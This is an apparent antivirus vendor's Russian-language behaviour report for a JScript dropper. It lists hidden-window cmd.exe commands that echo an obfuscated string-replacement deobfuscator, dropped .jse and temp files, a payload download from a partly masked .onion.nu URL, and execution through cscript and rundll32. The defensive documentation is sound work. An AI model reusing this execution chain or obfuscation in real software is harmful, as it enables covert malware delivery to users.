Техническая информация
- '<SYSTEM32>\cmd.exe' /c "ECHo new Function ('acet', 'var acet = acet.replace(/wfomse/g, "A").replace(/vzucjy/g, "S").replace(/thusumq/g, ":").replace(/awtetje/g, "t").replace(/xjipcec/g, "v").replace(/kafni/g, "e")...
- <Текущая директория>\imugaqm.jse
- %TEMP%\rade64ad.tmp
- <Текущая директория>\imugaqm.jse
- http://ur######lmo3krly.onion.nu/16.mov
- DNS ASK ur######lmo3krly.onion.nu
- '<SYSTEM32>\cmd.exe' /c "ECHo new Function ('acet', 'var acet = acet.replace(/wfomse/g, "A").replace(/vzucjy/g, "S").replace(/thusumq/g, ":").replace(/awtetje/g, "t").replace(/xjipcec/g, "v").replace(/kafni/g, "e")...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c %TEMP%\\radE64AD.tmp' (со скрытым окном)
- '<SYSTEM32>\cscript.exe' //b imUGAqm.JSE
- '<SYSTEM32>\cmd.exe' /c %TEMP%\\radE64AD.tmp
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\shell32.dll,OpenAs_RunDLL %TEMP%\radE64AD.tmp